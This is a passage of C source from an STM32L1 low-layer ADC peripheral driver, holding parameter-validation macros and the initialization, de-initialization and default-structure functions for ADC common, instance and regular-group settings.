LL_ADC_LP_AUTOWAIT) \ || ((__LOW_POWER__) == LL_ADC_LP_AUTOWAIT_7_APBCLOCKCYCLES) \ || ((__LOW_POWER__) == LL_ADC_LP_AUTOWAIT_15_APBCLOCKCYCLES) \ || ((__LOW_POWER__) == LL_ADC_LP_AUTOWAIT_31_APBCLOCKCYCLES) \ || ((__LOW_POWER__) == LL_ADC_LP_AUTOWAIT_63_APBCLOCKCYCLES) \ || ((__LOW_POWER__) == LL_ADC_LP_AUTOWAIT_127_APBCLOCKCYCLES) \ || ((__LOW_POWER__) == LL_ADC_LP_AUTOWAIT_255_APBCLOCKCYCLES) \ ) #define IS_LL_ADC_LOW_POWER_AUTOPOWEROFF(__LOW_POWER__) \ ( ((__LOW_POWER__) == LL_ADC_LP_AUTOPOWEROFF_NONE) \ || ((__LOW_POWER__) == LL_ADC_LP_AUTOPOWEROFF_IDLE_PHASE) \ || ((__LOW_POWER__) == LL_ADC_LP_AUTOPOWEROFF_AUTOWAIT_PHASE) \ || ((__LOW_POWER__) == LL_ADC_LP_AUTOPOWEROFF_IDLE_AUTOWAIT_PHASES) \ ) #define IS_LL_ADC_SCAN_SELECTION(__SCAN_SELECTION__) \ ( ((__SCAN_SELECTION__) == LL_ADC_SEQ_SCAN_DISABLE) \ || ((__SCAN_SELECTION__) == LL_ADC_SEQ_SCAN_ENABLE) \ ) #define IS_LL_ADC_SEQ_SCAN_MODE(__SEQ_SCAN_MODE__) \ ( ((__SCAN_MODE__) == LL_ADC_SEQ_SCAN_DISABLE) \ || ((__SCAN_MODE__) == LL_ADC_SEQ_SCAN_ENABLE) \ ) #define IS_LL_ADC_CHANNELS_BANK(__CHANNELS_BANK__) \ ( ((__CHANNELS_BANK__) == LL_ADC_CHANNELS_BANK_A) \ || ((__CHANNELS_BANK__) == LL_ADC_CHANNELS_BANK_B) \ ) /* Check of parameters for configuration of ADC hierarchical scope: */ /* ADC group regular */ #define IS_LL_ADC_REG_TRIG_SOURCE(__REG_TRIG_SOURCE__) \ ( ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_SOFTWARE) \ || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM2_TRGO) \ || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM2_CH3) \ || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM3_TRGO) \ || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM2_CH2) \ || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM3_CH1) \ || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM3_CH3) \ || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM4_TRGO) \ || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM4_CH4) \ || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM6_TRGO) \ || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM9_CH2) \ || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM9_TRGO) \ || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_EXTI_LINE11) \ ) #define IS_LL_ADC_REG_CONTINUOUS_MODE(__REG_CONTINUOUS_MODE__) \ ( ((__REG_CONTINUOUS_MODE__) == LL_ADC_REG_CONV_SINGLE) \ || ((__REG_CONTINUOUS_MODE__) == LL_ADC_REG_CONV_CONTINUOUS) \ ) #define IS_LL_ADC_REG_DMA_TRANSFER(__REG_DMA_TRANSFER__) \ ( ((__REG_DMA_TRANSFER__) == LL_ADC_REG_DMA_TRANSFER_NONE) \ || ((__REG_DMA_TRANSFER__) == LL_ADC_REG_DMA_TRANSFER_LIMITED) \ || ((__REG_DMA_TRANSFER__) == LL_ADC_REG_DMA_TRANSFER_UNLIMITED) \ ) #define IS_LL_ADC_REG_FLAG_EOC_SELECTION(__REG_FLAG_EOC_SELECTION__) \ ( ((__REG_FLAG_EOC_SELECTION__) == LL_ADC_REG_FLAG_EOC_SEQUENCE_CONV) \ || ((__REG_FLAG_EOC_SELECTION__) == LL_ADC_REG_FLAG_EOC_UNITARY_CONV) \ ) #define IS_LL_ADC_REG_SEQ_SCAN_LENGTH(__REG_SEQ_SCAN_LENGTH__) \ ( ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_DISABLE) \ || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_2RANKS) \ || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_3RANKS) \ || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_4RANKS) \ || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_5RANKS) \ || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_6RANKS) \ || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_7RANKS) \ || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_8RANKS) \ || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_9RANKS) \ || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_10RANKS) \ || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_11RANKS) \ || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_12RANKS) \ || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_13RANKS) \ || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_14RANKS) \ || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_15RANKS) \ || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_16RANKS) \ ) #define IS_LL_ADC_REG_SEQ_SCAN_DISCONT_MODE(__REG_SEQ_DISCONT_MODE__) \ ( ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_DISABLE) \ || ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_1RANK) \ || ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_2RANKS) \ || ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_3RANKS) \ || ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_4RANKS) \ || ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_5RANKS) \ || ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_6RANKS) \ || ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_7RANKS) \ || ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_8RANKS) \ ) /* Check of parameters for configuration of ADC hierarchical scope: */ /* ADC group injected */ #define IS_LL_ADC_INJ_TRIG_SOURCE(__INJ_TRIG_SOURCE__) \ ( ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_SOFTWARE) \ || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM9_CH1) \ || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM9_TRGO) \ || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM2_TRGO) \ || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM2_CH1) \ || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM3_CH4) \ || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM4_TRGO) \ || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM4_CH1) \ || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM4_CH2) \ || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM4_CH3) \ || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM10_CH1) \ || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM7_TRGO) \ || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_EXTI_LINE15) \ ) #define IS_LL_ADC_INJ_TRIG_EXT_EDGE(__INJ_TRIG_EXT_EDGE__) \ ( ((__INJ_TRIG_EXT_EDGE__) == LL_ADC_INJ_TRIG_EXT_RISING) \ || ((__INJ_TRIG_EXT_EDGE__) == LL_ADC_INJ_TRIG_EXT_FALLING) \ || ((__INJ_TRIG_EXT_EDGE__) == LL_ADC_INJ_TRIG_EXT_RISINGFALLING) \ ) #define IS_LL_ADC_INJ_TRIG_AUTO(__INJ_TRIG_AUTO__) \ ( ((__INJ_TRIG_AUTO__) == LL_ADC_INJ_TRIG_INDEPENDENT) \ || ((__INJ_TRIG_AUTO__) == LL_ADC_INJ_TRIG_FROM_GRP_REGULAR) \ ) #define IS_LL_ADC_INJ_SEQ_SCAN_LENGTH(__INJ_SEQ_SCAN_LENGTH__) \ ( ((__INJ_SEQ_SCAN_LENGTH__) == LL_ADC_INJ_SEQ_SCAN_DISABLE) \ || ((__INJ_SEQ_SCAN_LENGTH__) == LL_ADC_INJ_SEQ_SCAN_ENABLE_2RANKS) \ || ((__INJ_SEQ_SCAN_LENGTH__) == LL_ADC_INJ_SEQ_SCAN_ENABLE_3RANKS) \ || ((__INJ_SEQ_SCAN_LENGTH__) == LL_ADC_INJ_SEQ_SCAN_ENABLE_4RANKS) \ ) #define IS_LL_ADC_INJ_SEQ_SCAN_DISCONT_MODE(__INJ_SEQ_DISCONT_MODE__) \ ( ((__INJ_SEQ_DISCONT_MODE__) == LL_ADC_INJ_SEQ_DISCONT_DISABLE) \ || ((__INJ_SEQ_DISCONT_MODE__) == LL_ADC_INJ_SEQ_DISCONT_1RANK) \ ) /** * @} */ /* Private function prototypes -----------------------------------------------*/ /* Exported functions --------------------------------------------------------*/ /** @addtogroup ADC_LL_Exported_Functions * @{ */ /** @addtogroup ADC_LL_EF_Init * @{ */ /** * @brief De-initialize registers of all ADC instances belonging to * the same ADC common instance to their default reset values. * @param ADCxy_COMMON ADC common instance * (can be set directly from CMSIS definition or by using helper macro @ref __LL_ADC_COMMON_INSTANCE() ) * @retval An ErrorStatus enumeration value: * - SUCCESS: ADC common registers are de-initialized * - ERROR: not applicable */ ErrorStatus LL_ADC_CommonDeInit(ADC_Common_TypeDef *ADCxy_COMMON) { /* Check the parameters */ assert_param(IS_ADC_COMMON_INSTANCE(ADCxy_COMMON)); /* Force reset of ADC clock (core clock) */ LL_APB2_GRP1_ForceReset(LL_APB2_GRP1_PERIPH_ADC1); /* Release reset of ADC clock (core clock) */ LL_APB2_GRP1_ReleaseReset(LL_APB2_GRP1_PERIPH_ADC1); return SUCCESS; } /** * @brief Initialize some features of ADC common parameters * (all ADC instances belonging to the same ADC common instance) * and multimode (for devices with several ADC instances available). * @note The setting of ADC common parameters is conditioned to * ADC instances state: * All ADC instances belonging to the same ADC common instance * must be disabled. * @param ADCxy_COMMON ADC common instance * (can be set directly from CMSIS definition or by using helper macro @ref __LL_ADC_COMMON_INSTANCE() ) * @param ADC_CommonInitStruct Pointer to a @ref LL_ADC_CommonInitTypeDef structure * @retval An ErrorStatus enumeration value: * - SUCCESS: ADC common registers are initialized * - ERROR: ADC common registers are not initialized */ ErrorStatus LL_ADC_CommonInit(ADC_Common_TypeDef *ADCxy_COMMON, LL_ADC_CommonInitTypeDef *ADC_CommonInitStruct) { ErrorStatus status = SUCCESS; /* Check the parameters */ assert_param(IS_ADC_COMMON_INSTANCE(ADCxy_COMMON)); assert_param(IS_LL_ADC_COMMON_CLOCK(ADC_CommonInitStruct->CommonClock)); /* Note: Hardware constraint (refer to description of functions */ /* "LL_ADC_SetCommonXXX()": */ /* On this STM32 serie, setting of these features is conditioned to */ /* ADC state: */ /* All ADC instances of the ADC common group must be disabled. */ if(__LL_ADC_IS_ENABLED_ALL_COMMON_INSTANCE(ADCxy_COMMON) == 0U) { /* Configuration of ADC hierarchical scope: */ /* - common to several ADC */ /* (all ADC instances belonging to the same ADC common instance) */ /* - Set ADC clock (conversion clock) */ LL_ADC_SetCommonClock(ADCxy_COMMON, ADC_CommonInitStruct->CommonClock); } else { /* Initialization error: One or several ADC instances belonging to */ /* the same ADC common instance are not disabled. */ status = ERROR; } return status; } /** * @brief Set each @ref LL_ADC_CommonInitTypeDef field to default value. * @param ADC_CommonInitStruct Pointer to a @ref LL_ADC_CommonInitTypeDef structure * whose fields will be set to default values. * @retval None */ void LL_ADC_CommonStructInit(LL_ADC_CommonInitTypeDef *ADC_CommonInitStruct) { /* Set ADC_CommonInitStruct fields to default values */ /* Set fields of ADC common */ /* (all ADC instances belonging to the same ADC common instance) */ ADC_CommonInitStruct->CommonClock = LL_ADC_CLOCK_ASYNC_DIV2; } /** * @brief De-initialize registers of the selected ADC instance * to their default reset values. * @note To reset all ADC instances quickly (perform a hard reset), * use function @ref LL_ADC_CommonDeInit(). * @param ADCx ADC instance * @retval An ErrorStatus enumeration value: * - SUCCESS: ADC registers are de-initialized * - ERROR: ADC registers are not de-initialized */ ErrorStatus LL_ADC_DeInit(ADC_TypeDef *ADCx) { ErrorStatus status = SUCCESS; /* Check the parameters */ assert_param(IS_ADC_ALL_INSTANCE(ADCx)); /* Disable ADC instance if not already disabled. */ if(LL_ADC_IsEnabled(ADCx) == 1U) { /* Set ADC group regular trigger source to SW start to ensure to not */ /* have an external trigger event occurring during the conversion stop */ /* ADC disable process. */ LL_ADC_REG_SetTriggerSource(ADCx, LL_ADC_REG_TRIG_SOFTWARE); /* Set ADC group injected trigger source to SW start to ensure to not */ /* have an external trigger event occurring during the conversion stop */ /* ADC disable process. */ LL_ADC_INJ_SetTriggerSource(ADCx, LL_ADC_INJ_TRIG_SOFTWARE); /* Disable the ADC instance */ LL_ADC_Disable(ADCx); } /* Check whether ADC state is compliant with expected state */ /* (hardware requirements of bits state to reset registers below) */ if(READ_BIT(ADCx->CR2, ADC_CR2_ADON) == 0U) { /* ========== Reset ADC registers ========== */ /* Reset register SR */ CLEAR_BIT(ADCx->SR, ( LL_ADC_FLAG_STRT | LL_ADC_FLAG_JSTRT | LL_ADC_FLAG_EOCS | LL_ADC_FLAG_OVR | LL_ADC_FLAG_JEOS | LL_ADC_FLAG_AWD1 ) ); /* Reset register CR1 */ CLEAR_BIT(ADCx->CR1, ( ADC_CR1_OVRIE | ADC_CR1_RES | ADC_CR1_AWDEN | ADC_CR1_JAWDEN | ADC_CR1_PDI | ADC_CR1_PDD | ADC_CR1_DISCNUM | ADC_CR1_JDISCEN | ADC_CR1_DISCEN | ADC_CR1_JAUTO | ADC_CR1_AWDSGL | ADC_CR1_SCAN | ADC_CR1_JEOCIE | ADC_CR1_AWDIE | ADC_CR1_EOCIE | ADC_CR1_AWDCH ) ); /* Reset register CR2 */ #if defined(ADC_CR2_CFG) CLEAR_BIT(ADCx->CR2, ( ADC_CR2_SWSTART | ADC_CR2_EXTEN | ADC_CR2_EXTSEL | ADC_CR2_JSWSTART | ADC_CR2_JEXTEN | ADC_CR2_JEXTSEL | ADC_CR2_ALIGN | ADC_CR2_EOCS | ADC_CR2_DDS | ADC_CR2_DMA | ADC_CR2_DELS | ADC_CR2_CFG | ADC_CR2_CONT | ADC_CR2_ADON ) ); #else CLEAR_BIT(ADCx->CR2, ( ADC_CR2_SWSTART | ADC_CR2_EXTEN | ADC_CR2_EXTSEL | ADC_CR2_JSWSTART | ADC_CR2_JEXTEN | ADC_CR2_JEXTSEL | ADC_CR2_ALIGN | ADC_CR2_EOCS | ADC_CR2_DDS | ADC_CR2_DMA | ADC_CR2_DELS | ADC_CR2_CONT | ADC_CR2_ADON ) ); #endif /* ADC_CR2_CFG */ /* Reset register SMPR1 */ /* Note: On STM32L1, ADC channels 27, 28, 29, 30, 31 are not available */ /* on all devices: only on STM32L1 Cat.4 and Cat.5. */ #if defined(ADC_SMPR0_SMP31) CLEAR_BIT(ADCx->SMPR1, ( ADC_SMPR1_SMP29 | ADC_SMPR1_SMP28 | ADC_SMPR1_SMP27 | ADC_SMPR1_SMP26 | ADC_SMPR1_SMP25 | ADC_SMPR1_SMP24 | ADC_SMPR1_SMP23 | ADC_SMPR1_SMP22 | ADC_SMPR1_SMP21 | ADC_SMPR1_SMP20 ) ); #else CLEAR_BIT(ADCx->SMPR1, ( ADC_SMPR1_SMP26 | ADC_SMPR1_SMP25 | ADC_SMPR1_SMP24 | ADC_SMPR1_SMP23 | ADC_SMPR1_SMP22 | ADC_SMPR1_SMP21 | ADC_SMPR1_SMP20 ) ); #endif /* ADC_SMPR0_SMP31 */ /* Reset register SMPR2 */ CLEAR_BIT(ADCx->SMPR2, ( ADC_SMPR2_SMP19 | ADC_SMPR2_SMP18 | ADC_SMPR2_SMP17 | ADC_SMPR2_SMP16 | ADC_SMPR2_SMP15 | ADC_SMPR2_SMP14 | ADC_SMPR2_SMP13 | ADC_SMPR2_SMP12 | ADC_SMPR2_SMP11 | ADC_SMPR2_SMP10 ) ); /* Reset register SMPR3 */ CLEAR_BIT(ADCx->SMPR3, ( ADC_SMPR3_SMP9 | ADC_SMPR3_SMP8 | ADC_SMPR3_SMP7 | ADC_SMPR3_SMP6 | ADC_SMPR3_SMP5 | ADC_SMPR3_SMP4 | ADC_SMPR3_SMP3 | ADC_SMPR3_SMP2 | ADC_SMPR3_SMP1 | ADC_SMPR3_SMP0 ) ); #if defined(ADC_SMPR0_SMP31) /* Reset register SMPR0 */ CLEAR_BIT(ADCx->SMPR0, (ADC_SMPR0_SMP31 | ADC_SMPR0_SMP30)); #endif /* ADC_SMPR0_SMP31 */ /* Reset register JOFR1 */ CLEAR_BIT(ADCx->JOFR1, ADC_JOFR1_JOFFSET1); /* Reset register JOFR2 */ CLEAR_BIT(ADCx->JOFR2, ADC_JOFR2_JOFFSET2); /* Reset register JOFR3 */ CLEAR_BIT(ADCx->JOFR3, ADC_JOFR3_JOFFSET3); /* Reset register JOFR4 */ CLEAR_BIT(ADCx->JOFR4, ADC_JOFR4_JOFFSET4); /* Reset register HTR */ SET_BIT(ADCx->HTR, ADC_HTR_HT); /* Reset register LTR */ CLEAR_BIT(ADCx->LTR, ADC_LTR_LT); /* Reset register SQR1 */ CLEAR_BIT(ADCx->SQR1, ( ADC_SQR1_L #if defined(ADC_SQR1_SQ28) | ADC_SQR1_SQ28 | ADC_SQR1_SQ27 #endif | ADC_SQR1_SQ26 | ADC_SQR1_SQ25) ); /* Reset register SQR2 */ CLEAR_BIT(ADCx->SQR2, ( ADC_SQR2_SQ24 | ADC_SQR2_SQ23 | ADC_SQR2_SQ22 | ADC_SQR2_SQ21 | ADC_SQR2_SQ20 | ADC_SQR2_SQ19) ); /* Reset register SQR3 */ CLEAR_BIT(ADCx->SQR3, ( ADC_SQR3_SQ18 | ADC_SQR3_SQ17 | ADC_SQR3_SQ16 | ADC_SQR3_SQ15 | ADC_SQR3_SQ14 | ADC_SQR3_SQ13) ); /* Reset register SQR4 */ CLEAR_BIT(ADCx->SQR4, ( ADC_SQR4_SQ12 | ADC_SQR4_SQ11 | ADC_SQR4_SQ10 | ADC_SQR4_SQ9 | ADC_SQR4_SQ8 | ADC_SQR4_SQ7 ) ); /* Reset register SQR5 */ CLEAR_BIT(ADCx->SQR5, ( ADC_SQR5_SQ6 | ADC_SQR5_SQ5 | ADC_SQR5_SQ4 | ADC_SQR5_SQ3 | ADC_SQR5_SQ2 | ADC_SQR5_SQ1 ) ); /* Reset register JSQR */ CLEAR_BIT(ADCx->JSQR, ( ADC_JSQR_JL | ADC_JSQR_JSQ4 | ADC_JSQR_JSQ3 | ADC_JSQR_JSQ2 | ADC_JSQR_JSQ1 ) ); /* Reset register DR */ /* bits in access mode read only, no direct reset applicable */ /* Reset registers JDR1, JDR2, JDR3, JDR4 */ /* bits in access mode read only, no direct reset applicable */ /* Reset register CCR */ CLEAR_BIT(ADC->CCR, ADC_CCR_TSVREFE | ADC_CCR_ADCPRE); } return status; } /** * @brief Initialize some features of ADC instance. * @note These parameters have an impact on ADC scope: ADC instance. * Affects both group regular and group injected (availability * of ADC group injected depends on STM32 families). * Refer to corresponding unitary functions into * @ref ADC_LL_EF_Configuration_ADC_Instance . * @note The setting of these parameters by function @ref LL_ADC_Init() * is conditioned to ADC state: * ADC instance must be disabled. * This condition is applied to all ADC features, for efficiency * and compatibility over all STM32 families. However, the different * features can be set under different ADC state conditions * (setting possible with ADC enabled without conversion on going, * ADC enabled with conversion on going, ...) * Each feature can be updated afterwards with a unitary function * and potentially with ADC in a different state than disabled, * refer to description of each function for setting * conditioned to ADC state. * @note After using this function, some other features must be configured * using LL unitary functions. * The minimum configuration remaining to be done is: * - Set ADC group regular or group injected sequencer: * map channel on the selected sequencer rank. * Refer to function @ref LL_ADC_REG_SetSequencerRanks(). * - Set ADC channel sampling time * Refer to function LL_ADC_SetChannelSamplingTime(); * @param ADCx ADC instance * @param ADC_InitStruct Pointer to a @ref LL_ADC_REG_InitTypeDef structure * @retval An ErrorStatus enumeration value: * - SUCCESS: ADC registers are initialized * - ERROR: ADC registers are not initialized */ ErrorStatus LL_ADC_Init(ADC_TypeDef *ADCx, LL_ADC_InitTypeDef *ADC_InitStruct) { ErrorStatus status = SUCCESS; /* Check the parameters */ assert_param(IS_ADC_ALL_INSTANCE(ADCx)); assert_param(IS_LL_ADC_RESOLUTION(ADC_InitStruct->Resolution)); assert_param(IS_LL_ADC_DATA_ALIGN(ADC_InitStruct->DataAlignment)); /* Note: On STM32L1, low power feature is set by concatenating */ /* values of @ref ADC_LL_EC_LP_MODE_AUTOWAIT */ /* and @ref ADC_LL_EC_LP_MODE_AUTOPOWEROFF. */ /* Check of the parameter is done for each of group of values, */ /* by excluding the other group of values. */ assert_param(IS_LL_ADC_LOW_POWER_AUTOWAIT(ADC_InitStruct->LowPowerMode & ~(ADC_CR1_PDI | ADC_CR1_PDD))); assert_param(IS_LL_ADC_LOW_POWER_AUTOPOWEROFF(ADC_InitStruct->LowPowerMode & ~(ADC_CR2_DELS))); assert_param(IS_LL_ADC_SCAN_SELECTION(ADC_InitStruct->SequencersScanMode)); /* Note: Hardware constraint (refer to description of this function): */ /* ADC instance must be disabled. */ if(LL_ADC_IsEnabled(ADCx) == 0U) { /* Configuration of ADC hierarchical scope: */ /* - ADC instance */ /* - Set ADC data resolution */ /* - Set ADC conversion data alignment */ /* - Set ADC low power mode */ MODIFY_REG(ADCx->CR1, ADC_CR1_RES | ADC_CR1_PDI | ADC_CR1_PDD | ADC_CR1_SCAN , ADC_InitStruct->Resolution | (ADC_InitStruct->LowPowerMode & (ADC_CR1_PDI | ADC_CR1_PDD)) | ADC_InitStruct->SequencersScanMode ); MODIFY_REG(ADCx->CR2, ADC_CR2_ALIGN | ADC_CR2_DELS , ADC_InitStruct->DataAlignment | (ADC_InitStruct->LowPowerMode & ADC_CR2_DELS) ); } else { /* Initialization error: ADC instance is not disabled. */ status = ERROR; } return status; } /** * @brief Set each @ref LL_ADC_InitTypeDef field to default value. * @param ADC_InitStruct Pointer to a @ref LL_ADC_InitTypeDef structure * whose fields will be set to default values. * @retval None */ void LL_ADC_StructInit(LL_ADC_InitTypeDef *ADC_InitStruct) { /* Set ADC_InitStruct fields to default values */ /* Set fields of ADC instance */ ADC_InitStruct->Resolution = LL_ADC_RESOLUTION_12B; ADC_InitStruct->DataAlignment = LL_ADC_DATA_ALIGN_RIGHT; ADC_InitStruct->LowPowerMode = (LL_ADC_LP_AUTOWAIT_NONE | LL_ADC_LP_AUTOPOWEROFF_NONE); /* Enable scan mode to have a generic behavior with ADC of other */ /* STM32 families, without this setting available: */ /* ADC group regular sequencer and ADC group injected sequencer depend */ /* only of their own configuration. */ ADC_InitStruct->SequencersScanMode = LL_ADC_SEQ_SCAN_ENABLE; } /** * @brief Initialize some features of ADC group regular. * @note These parameters have an impact on ADC scope: ADC group regular. * Refer to corresponding unitary functions into * @ref ADC_LL_EF_Configuration_ADC_Group_Regular * (functions with prefix "REG"). * @note The setting of these parameters by function @ref LL_ADC_Init() * is conditioned to ADC state: * ADC instance must be disabled. * This condition is applied to all ADC features, for efficiency * and compatibility over all STM32 families. However, the different * features can be set under different ADC state conditions * (setting possible with ADC enabled without conversion on going, * ADC enabled with conversion on going, ...) * Each feature can be updated afterwards with a unitary function * and potentially with ADC in a different state than disabled, * refer to description of each function for setting * conditioned to ADC state. * @note After using this function, other features must be configured * using LL unitary functions. * The minimum configuration remaining to be done is: * - Set ADC group regular or group injected sequencer: * map channel on the selected sequencer rank. * Refer to function @ref LL_ADC_REG_SetSequencerRanks(). * - Set ADC channel sampling time * Refer to function LL_ADC_SetChannelSamplingTime(); * @param ADCx ADC instance * @param ADC_REG_InitStruct Pointer to a @ref LL_ADC_REG_InitTypeDef structure * @retval An ErrorStatus enumeration value: * - SUCCESS: ADC registers are initialized * - ERROR: ADC registers are not initialized */ ErrorStatus LL_ADC_REG_Init(ADC_TypeDef *ADCx, LL_ADC_REG_InitTypeDef *ADC_REG_InitStruct) { ErrorStatus status = SUCCESS; /* Check the parameters */ assert_param(IS_ADC_ALL_INSTANCE(ADCx)); assert_param(IS_LL_ADC_REG_TRIG_SOURCE(ADC_REG_InitStruct->TriggerSource)); assert_param(IS_LL_ADC_REG_SEQ_SCAN_LENGTH(ADC_REG_InitStruct->SequencerLength)); if(ADC_REG_InitStruct->SequencerLength != LL_ADC_REG_SEQ_SCAN_DISABLE) { assert_param(IS_LL_ADC_REG_SEQ_SCAN_DISCONT_MODE(ADC_REG_InitStruct->SequencerDiscont)); } assert_param(IS_LL_ADC_REG_CONTINUOUS_MODE(ADC_REG_InitStruct->ContinuousMode)); assert_param(IS_LL_ADC_REG_DMA_TRANSFER(ADC_REG_InitStruct->DMATransfer)); /* Note: Hardware constraint (refer to description of this function): */ /* ADC instance must be disabled. */ if(LL_ADC_IsEnabled(ADCx) == 0U) { /* Configuration of ADC hierarchical scope: */ /* - ADC group regular */ /* - Set ADC group regular trigger source */ /* - Set ADC group regular sequencer length */ /* - Set ADC group regular sequencer discontinuous mode */ /* - Set ADC group regular continuous mode */ /* - Set ADC group regular conversion data transfer: no transfer or */ /* transfer by DMA, and DMA requests mode */ /* Note: On this STM32 serie, ADC trigger edge is set when starting */ /* ADC conversion. */ /* Refer to function @ref LL_ADC_REG_StartConversionExtTrig(). */ if(ADC_REG_InitStruct->SequencerLength != LL_ADC_REG_SEQ_SCAN_DISABLE) { MODIFY_REG(ADCx->CR1, ADC_CR1_DISCEN | ADC_CR1_DISCNUM , ADC_REG_InitStruct->SequencerLength | ADC_REG_InitStruct->SequencerDiscont ); } else { MODIFY_REG(ADCx->CR1, ADC_CR1_DISCEN | ADC_CR1_DISCNUM , ADC_REG_InitStruct->SequencerLength | LL_ADC_REG_SEQ_DISCONT_DISABLE ); } MODIFY_REG(ADCx->CR2, ADC_CR2_EXTSEL | ADC_CR2_EXTEN | ADC_CR2_CONT | ADC_CR2_DMA | ADC_CR2_DDS , (ADC_REG_InitStruct->TriggerSource & ADC_CR2_EXTSEL) | ADC_REG_InitStruct->ContinuousMode | ADC_REG_InitStruct->DMATransfer ); /* Set ADC group regular sequencer length and scan direction */ /* Note: Hardware constraint (refer to description of this function): */ /* Note: If ADC instance feature scan mode is disabled */ /* (refer to ADC instance initialization structure */ /* parameter @ref SequencersScanMode */ /* or function @ref LL_ADC_SetSequencersScanMode() ), */ /* this parameter is discarded. */ LL_ADC_REG_SetSequencerLength(ADCx, ADC_REG_InitStruct->SequencerLength); } else { /* Initialization error: ADC instance is not disabled. */ status = ERROR; } return status; } /** * @brief Set each @ref LL_ADC_REG_InitTypeDef field to default value. * @param ADC_REG_InitStruct Pointer to a @ref LL_ADC_REG_InitTypeDef structure * whose fields will be set to default values. * @retval None */ void LL_ADC_REG_StructInit(LL_ADC_REG_InitTypeDef *ADC_REG_InitStruct) { /* Set ADC_REG_InitStruct fields to default values */ /* Set fields of ADC group regular */ /* Note: On this STM32 serie, ADC trigger edge is set when starting */ /* ADC conversion. */ /* Refer to function @ref LL_ADC_REG_StartConversionExtTrig(). */ ADC_REG_InitStruct->TriggerSource = LL_ADC_REG_TRIG_SOFTWARE; ADC_REG_InitStruct->SequencerLength = LL_ADC_REG_SEQ_SCAN_DISABLE; ADC_REG_InitStruct->SequencerDiscont = LL_ADC_REG_SEQ_DISCONT_DISABLE; ADC_REG_InitStruct->ContinuousMode = LL_ADC_REG_CONV_SINGLE; ADC_REG_InitStruct->DMATransfer = LL_ADC_REG_DMA_TRANSFER_NONE; } /** * @brief Initialize some features of ADC group injected. * @note These parameters have an impact on ADC scope: ADC group injected. * Refer to corresponding unitary functions into * @ref ADC_LL_EF_Configuration_ADC_Group_Regular * (functions with prefix "INJ"). * @note The setting of these parameters by function @ref LL_ADC_Init() * is conditioned to ADC state: * ADC instance must be disabled. * This condition is applied to all ADC features, for efficiency * and compatibility over all STM32 families. However, the different * features can be set under different ADC state conditions * (setting possible with ADC enabled without conversion on going, * ADC enabled with conversion on going, ...) * Each feature can be 